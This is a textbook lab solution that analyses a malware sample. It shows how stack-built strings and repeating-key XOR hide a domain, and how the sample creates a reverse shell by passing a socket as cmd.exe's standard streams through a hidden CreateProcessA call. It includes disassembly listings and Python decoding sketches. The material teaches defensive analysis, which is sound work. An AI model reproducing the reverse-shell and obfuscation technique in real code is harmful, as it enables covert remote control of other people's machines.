Practical Malware Analysis by Andrew Honig. Published by No Starch Press, 2012.

Lab 9-2 Solutions

Short Answers

  1. The imports and the string cmd are the only interesting strings that appear statically in the binary.

  2. It terminates without doing much.

  3. Rename the file to ocl.exe before you run it.

  4. A string is being built on the stack, a technique attackers use to hide strings from simple strings utilities and basic static analysis.

  5. The string 1qaz2wsx3edc and a pointer to a buffer of data are passed to subroutine 0x401089.

  6. The malware uses the domain practicalmalwareanalysis.com.

  7. The malware will XOR the encoded DNS name with the string 1qaz2wsx3edc to decode the domain name.

  8. The malware is setting the stdout, stderr, and stdin handles (used in the STARTUPINFO structure of CreateProcessA) to the socket. Since CreateProcessA is called with cmd as an argument, this will create a reverse shell by tying the command shell to the socket.

Detailed Analysis

We will use dynamic analysis and OllyDbg to analyze this piece of malware in order to determine its functionality. But before we get into debugging, let’s begin by running Strings on the binary. We see the imports and the string cmd. Next, we’ll simply run the binary to see if anything interesting happens.

Based on the process launch and exit in Process Explorer, the process seems to terminate almost immediately. We are definitely going to need to debug this piece to see what’s going on.

When we load the binary into IDA Pro, we see the main function begins at 0x401128. OllyDbg will break at the entry point of the application, but the entry point contains a lot of uninteresting code generated by the compiler, so we’ll set a software breakpoint on main, since we want to focus on it.

Decoding Stack-Formed Strings

If we click the Run button, we hit the first breakpoint at main. The first thing to notice is a long series of mov instructions moving single bytes into local variables, beginning at 0x401133, as shown in Example C-14.

Example C-14. Building an ASCII string on the stack, one character at a time

00401128         push    ebp
00401129         mov     ebp, esp
0040112B         sub     esp, 304h
00401131         push    esi
00401132         push    edi
00401133         mov     [ebp+var_1B0], 31h 
0040113A         mov     [ebp+var_1AF], 71h
00401141         mov     [ebp+var_1AE], 61h
00401148         mov     [ebp+var_1AD], 7Ah
0040114F         mov     [ebp+var_1AC], 32h
00401156         mov     [ebp+var_1AB], 77h
0040115D         mov     [ebp+var_1AA], 73h
00401164         mov     [ebp+var_1A9], 78h
0040116B         mov     [ebp+var_1A8], 33h
00401172         mov     [ebp+var_1A7], 65h
00401179         mov     [ebp+var_1A6], 64h
00401180         mov     [ebp+var_1A5], 63h
00401187         mov     [ebp+var_1A4], 0 
0040118E         mov     [ebp+Str1], 6Fh
00401195         mov     [ebp+var_19F], 63h
0040119C         mov     [ebp+var_19E], 6Ch
004011A3         mov     [ebp+var_19D], 2Eh
004011AA         mov     [ebp+var_19C], 65h
004011B1         mov     [ebp+var_19B], 78h
004011B8         mov     [ebp+var_19A], 65h
004011BF         mov     [ebp+var_199], 0 

This code builds two ASCII strings by moving each character onto the stack, followed by NULL terminators at 0x401187 and 0x4011BF. This is a popular method of string obfuscation. Each obfuscated string is referenced through the variable that holds its first character, which yields the full NULL-terminated ASCII string. We single-step over these moves and watch for the strings being created on the stack in the lower-right pane. We stop executing at 0x4011C6, right-click EBP, and select Follow in Dump. By scrolling up to the first string at [EBP-1B0], we can see the string 1qaz2wsx3edc being created. The second string is created at [EBP-1A0] and reads ocl.exe.
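
The same two strings can be recovered offline from the immediate values in Example C-14. The following Python sketch is only an illustration: the helper name decode_stack_string is hypothetical, and the byte lists are copied by hand from the listing.

```python
# Immediate values copied from the mov instructions in Example C-14.
KEY_BYTES = [0x31, 0x71, 0x61, 0x7A, 0x32, 0x77, 0x73, 0x78,
             0x33, 0x65, 0x64, 0x63, 0x00]
NAME_BYTES = [0x6F, 0x63, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x00]


def decode_stack_string(values):
    """Return the ASCII string that ends at the first NULL byte."""
    raw = bytes(values)
    return raw.split(b"\x00", 1)[0].decode("ascii")


key_string = decode_stack_string(KEY_BYTES)
file_name = decode_stack_string(NAME_BYTES)
print(key_string)  # 1qaz2wsx3edc
print(file_name)   # ocl.exe
```

Decoding the bytes this way confirms what the dump pane shows, without needing to run the sample.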

Filename Check

After these strings are created, we can see a call to GetModuleFileNameA in Example C-15 at 0x401208, and then a function call within the Lab09-02.exe malware to 0x401550. If we try to analyze this function in OllyDbg, we’ll find that it’s rather complicated. If we examine it in IDA Pro, we’ll see that it is the C runtime library function _strrchr. OllyDbg missed this due to its lack of symbol support. If we load the binary into IDA Pro, we can let IDA Pro use its FLIRT signature detection to correctly identify these library functions, as shown at 0x401217.

Example C-15. IDA Pro labels strrchr properly, but OllyDbg does not.

00401208     call    ds:GetModuleFileNameA 
0040120E     push    5Ch         ; Ch
00401210     lea     ecx, [ebp+Str]
00401216     push    ecx         ; Str
00401217     call    _strrchr 

Let’s verify this by setting a breakpoint on the call at 0x401217. We can see two arguments being pushed on the stack. The first is a backslash (0x5C), and the second is the buffer filled in by the GetModuleFileNameA call, which holds the full path of the current executable. The malware is searching backward for the last backslash in an attempt to get the name (rather than the full path) of the executable being executed. If we step over the call to _strrchr, we can see that EAX is pointing to the string \Lab09-02.exe.

The next function call (0x4014C0) reveals a situation similar to _strrchr. IDA Pro identifies this function as _strcmp, as shown in Example C-16.

Example C-16. IDA Pro labels strcmp properly, but OllyDbg does not.

0040121F     mov     [ebp+Str2], eax
00401222     mov     edx, [ebp+Str2]
00401225     add     edx, 1 
00401228     mov     [ebp+Str2], edx
0040122B     mov     eax, [ebp+Str2]
0040122E     push    eax         ; Str2
0040122F     lea     ecx, [ebp+Str1]
00401235     push    ecx         ; Str1
00401236     call    _strcmp

We’ll determine which strings are being compared by setting a breakpoint on the call to _strcmp at 0x401236. Once our breakpoint is hit, we can see the two strings being sent to the _strcmp call. The first is the pointer into the path returned by GetModuleFileNameA (incremented by one at 0x401225 to skip the backslash), and the other is ocl.exe (our decoded string from earlier). If the strings match, EAX should contain 0, the test eax,eax will set the zero flag, and execution will then go to 0x40124C. If the strings do not match, it looks like the program will exit, which explains why the malware terminated when we tried to execute it earlier. The malware must be named ocl.exe in order to properly execute.

Let’s rename the binary ocl.exe and set a breakpoint at 0x40124C. If our analysis is correct, the malware should not exit, and our breakpoint will be hit. Success! Our breakpoint was hit, and we can continue our analysis in OllyDbg.
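
The filename check described above can be modeled in a few lines of Python. This is a rough sketch, not the malware's code: the function name passes_filename_check and the sample paths are hypothetical, and the handling of a path without a backslash is a simplification (the disassembly shown does not check the _strrchr result).

```python
def passes_filename_check(module_path, expected="ocl.exe"):
    """Mimic the strrchr/strcmp sequence from Examples C-15 and C-16."""
    # strrchr(path, 0x5C): locate the last backslash in the full path.
    last_sep = module_path.rfind("\\")
    if last_sep == -1:
        # Simplification: this sketch just reports a mismatch here.
        return False
    # add edx, 1: skip the backslash so only the filename remains.
    file_name = module_path[last_sep + 1:]
    # strcmp returns 0 only on an exact, case-sensitive match.
    return file_name == expected


print(passes_filename_check(r"C:\samples\Lab09-02.exe"))  # False
print(passes_filename_check(r"C:\samples\ocl.exe"))       # True
```

Because the comparison is an exact strcmp, a name such as OCL.EXE would fail the check in this model as well.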

Decoding XOR Encoded Strings

WSAStartup and WSASocket are imported, so we can assume some networking functionality is going to be taking place. The next major function call is at 0x4012BD to the function 0x401089. Let’s set a breakpoint at 0x401089 and inspect the stack for the arguments to this function call.

The two arguments being passed to this function are a stack buffer (encoded string) and the string 1qaz2wsx3edc (key string). We step into the function and step to the call at 0x401440, which passes the key string to strlen. It returns 0xC, which is moved into [EBP-104]. Next, [EBP-108] is initialized to 0. OllyDbg has noted a loop in progress, which makes sense since [EBP-108] is a counter that is incremented at 0x4010DA and compared to 0x20 at 0x4010E3. As the loop continues to execute, we see our key string going through an idiv and mov instruction sequence, as shown in Example C-17.

Example C-17. String decoding functionality

004010E3     cmp     [ebp+var_108], 20h
004010EA     jge     short loc_40111D 
004010EC     mov     edx, [ebp+arg_4]
004010EF     add     edx, [ebp+var_108]
004010F5     movsx   ecx, byte ptr [edx]
004010F8     mov     eax, [ebp+var_108]
004010FE     cdq
004010FF     idiv    [ebp+var_104]
00401105     mov     eax, [ebp+Str]
00401108     movsx   edx, byte ptr [eax+edx] 
0040110C     xor     ecx, edx 
0040110E     mov     eax, [ebp+var_108]
00401114     mov     [ebp+eax+var_100], cl
0040111B     jmp     short loc_4010D4

This code computes an index into the key string. Notice the use of EDX after the idiv instruction at 0x401108: idiv leaves the remainder in EDX, so the counter is taken modulo the key length, which lets the malware wrap around the key when the encoded string is longer than the key string. We then see an interesting XOR at 0x40110C.

If we set a breakpoint at 0x4010F5, we can see which value is being pointed to by EDX and being moved into ECX, which will tell us the value that is getting XOR’ed later in the function. When we click Follow in Dump on EDX, we see that this is a pointer to the first argument to this function call (encoded string). ECX will contain 0x46, which is the first byte in the encoded string. We set a breakpoint at 0x40110C to see what is being XOR’ed on the first iteration through the loop. We see that EDX will contain 0x31 (first byte of key string), and we again see that ECX will contain 0x46.

Let’s execute the loop a few more times and try to make sense of the string being decoded. After clicking play a few more times, we can see the string www.prac. This could be the start of a domain that the malware is trying to communicate with. Let’s continue until var_108 ([EBP-108], our counter variable) equals 0x20. Once the jge short 0x40111D at 0x4010EA is taken, the final string placed into EAX is www.practicalmalwareanalysis.com (which happens to be of length 0x20), and the function will then return to the main function. This function decoded the string www.practicalmalwareanalysis.com by using a multibyte XOR loop with the string 1qaz2wsx3edc as the key.
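
The decoding loop in Example C-17 amounts to a repeating-key XOR. The Python sketch below illustrates the idea under one stated assumption: the encoded buffer is reconstructed by encoding the known plaintext, since the raw encoded bytes are not listed in this solution. The function name xor_with_key is hypothetical.

```python
KEY = b"1qaz2wsx3edc"
DOMAIN = b"www.practicalmalwareanalysis.com"


def xor_with_key(data, key):
    """XOR each byte of data with key[i % len(key)], as in Example C-17."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Assumption: the encoded buffer is rebuilt from the known plaintext here;
# it was not copied out of the binary.
encoded = xor_with_key(DOMAIN, KEY)
decoded = xor_with_key(encoded, KEY)

print(hex(encoded[0]))          # 0x46
print(decoded.decode("ascii"))  # www.practicalmalwareanalysis.com
print(len(decoded))             # 32
```

The first encoded byte comes out as 0x46 (0x77 XOR 0x31), which matches the value observed in ECX on the first loop iteration, and the length of 32 matches the 0x20 loop bound.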

Back in the main function, we see EAX being passed to a gethostbyname call. This call will return an IP address, which will populate the sockaddr_in structure.

Next, we see a call to ntohs with an argument of 0x270f, or 9999 in decimal. The result is moved into a sockaddr_in structure along with 0x2, which represents AF_INET (the code for Internet sockets). The next call will connect the malware to www.practicalmalwareanalysis.com on TCP port 9999. If the connection succeeds, the malware will continue executing until 0x40137A. If it fails, the malware will sleep for 30 seconds, go back to the beginning of the main function, and repeat the process. We can use Netcat and ApateDNS to fool the malware into connecting back to an IP address we control.
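
To make the structure contents concrete, the following Python sketch packs a sockaddr_in the way it would appear in memory on 32-bit x86 Windows. It is an illustration only: pack_sockaddr_in is a hypothetical helper, and 127.0.0.1 is a placeholder for whatever address gethostbyname returns.

```python
import struct

AF_INET = 2      # address family value noted in the text
PORT = 0x270F    # 9999 in decimal


def pack_sockaddr_in(port, ipv4_bytes):
    """Pack a 16-byte sockaddr_in as laid out on little-endian x86."""
    return (
        struct.pack("<H", AF_INET)   # sin_family in host (little-endian) order
        + struct.pack(">H", port)    # sin_port in network (big-endian) order
        + ipv4_bytes                 # sin_addr, four bytes in network order
        + b"\x00" * 8                # sin_zero padding
    )


# Placeholder address; the malware would use the gethostbyname result.
addr = pack_sockaddr_in(PORT, bytes([127, 0, 0, 1]))
print(PORT)        # 9999
print(addr.hex())  # 0200270f7f0000010000000000000000
```

When following the structure in the OllyDbg dump pane, the port therefore shows up as the byte pair 27 0F immediately after the 02 00 family field.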

If we step into the function call made at 0x4013a9 (which calls 0x401000), we see two function calls to 0x4013E0. Again, this is another example where OllyDbg does not identify the C runtime library function memset, whereas IDA Pro does. Next, we see a call to CreateProcessA at 0x40106E, as shown in Example C-18. Before the call, a structure is being populated. We’ll turn to IDA Pro to shed some light on what’s going on here.

Reverse Shell Analysis

This appears to be a reverse shell, created using a method that’s popular among malware authors. In this method, the STARTUPINFO structure that is passed to CreateProcessA is manipulated. CreateProcessA is called, and it runs cmd.exe with its window suppressed, so that it isn’t visible to the user under attack. Before the call to CreateProcessA, a socket is created and a connection is established to a remote server. That socket is tied to the standard streams (stdin, stdout, and stderr) for cmd.exe.

Example C-18 shows this method of reverse shell creation in action.

Example C-18. Creating a reverse shell using CreateProcessA and the STARTUPINFO structure

0040103B     mov     [ebp+StartupInfo.wShowWindow], SW_HIDE 
00401041     mov     edx, [ebp+Socket]
00401044     mov     [ebp+StartupInfo.hStdInput], edx 
00401047     mov     eax, [ebp+StartupInfo.hStdInput]
0040104A     mov     [ebp+StartupInfo.hStdError], eax 
0040104D     mov     ecx, [ebp+StartupInfo.hStdError]
00401050     mov     [ebp+StartupInfo.hStdOutput], ecx 
00401053     lea     edx, [ebp+ProcessInformation]
00401056     push    edx         ; lpProcessInformation
00401057     lea     eax, [ebp+StartupInfo]
0040105A     push    eax         ; lpStartupInfo
0040105B     push    0           ; lpCurrentDirectory
0040105D     push    0           ; lpEnvironment
0040105F     push    0           ; dwCreationFlags
00401061     push    1           ; bInheritHandles
00401063     push    0           ; lpThreadAttributes
00401065     push    0           ; lpProcessAttributes
00401067     push    offset CommandLine ; "cmd" 
0040106C     push    0           ; lpApplicationName
0040106E     call    ds:CreateProcessA

The STARTUPINFO structure is manipulated, and then parameters are passed to CreateProcessA. We see that CreateProcessA is going to run cmd.exe because cmd is passed as the command line at 0x401067. The wShowWindow member of the structure is set to SW_HIDE at 0x40103B, which will hide cmd.exe’s window when it is launched. At 0x401044, 0x40104A, and 0x401050, we see that the standard streams in the STARTUPINFO structure are set to the socket. This directly ties the standard streams to the socket for cmd.exe, so when it is launched, all of the data that comes over the socket will be sent to cmd.exe, and all output generated by cmd.exe will be sent over the socket.
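
When examining the populated structure in a memory dump, it helps to know where each member sits. The sketch below models the 32-bit STARTUPINFOA layout with ctypes and applies a simple heuristic for the pattern described above. Several things here are assumptions rather than facts from the listing: the class name StartupInfoA32, the helper looks_like_socket_shell, and the handle value 0x74 are hypothetical, and the dwFlags constants come from the Windows API rather than from Example C-18.

```python
import ctypes

# Windows API constants (not shown in Example C-18).
STARTF_USESHOWWINDOW = 0x00000001
STARTF_USESTDHANDLES = 0x00000100
SW_HIDE = 0


class StartupInfoA32(ctypes.Structure):
    """32-bit STARTUPINFOA; pointers and handles modeled as 4-byte values."""
    _fields_ = [
        ("cb", ctypes.c_uint32),
        ("lpReserved", ctypes.c_uint32),
        ("lpDesktop", ctypes.c_uint32),
        ("lpTitle", ctypes.c_uint32),
        ("dwX", ctypes.c_uint32),
        ("dwY", ctypes.c_uint32),
        ("dwXSize", ctypes.c_uint32),
        ("dwYSize", ctypes.c_uint32),
        ("dwXCountChars", ctypes.c_uint32),
        ("dwYCountChars", ctypes.c_uint32),
        ("dwFillAttribute", ctypes.c_uint32),
        ("dwFlags", ctypes.c_uint32),
        ("wShowWindow", ctypes.c_uint16),
        ("cbReserved2", ctypes.c_uint16),
        ("lpReserved2", ctypes.c_uint32),
        ("hStdInput", ctypes.c_uint32),
        ("hStdOutput", ctypes.c_uint32),
        ("hStdError", ctypes.c_uint32),
    ]


def looks_like_socket_shell(si):
    """Heuristic: std handles are in use and all three share one handle."""
    uses_handles = bool(si.dwFlags & STARTF_USESTDHANDLES)
    same_handle = si.hStdInput == si.hStdOutput == si.hStdError != 0
    return uses_handles and same_handle


si = StartupInfoA32()
si.cb = ctypes.sizeof(StartupInfoA32)
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES
si.wShowWindow = SW_HIDE
si.hStdInput = si.hStdOutput = si.hStdError = 0x74  # hypothetical handle

print(ctypes.sizeof(StartupInfoA32))    # 68
print(StartupInfoA32.hStdInput.offset)  # 56
print(looks_like_socket_shell(si))      # True
```

The three handle members occupy the last 12 bytes of the 68-byte structure, so in a dump of the structure the same socket handle value should appear three times in a row at offsets 56, 60, and 64.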

In summary, we determined that this malware is a simple reverse shell with obfuscated strings, and that the file must be renamed ocl.exe before it will run successfully. The strings are obfuscated by building them on the stack and by using a multibyte XOR. In Chapter 13, we will cover data-encoding techniques like this in more detail.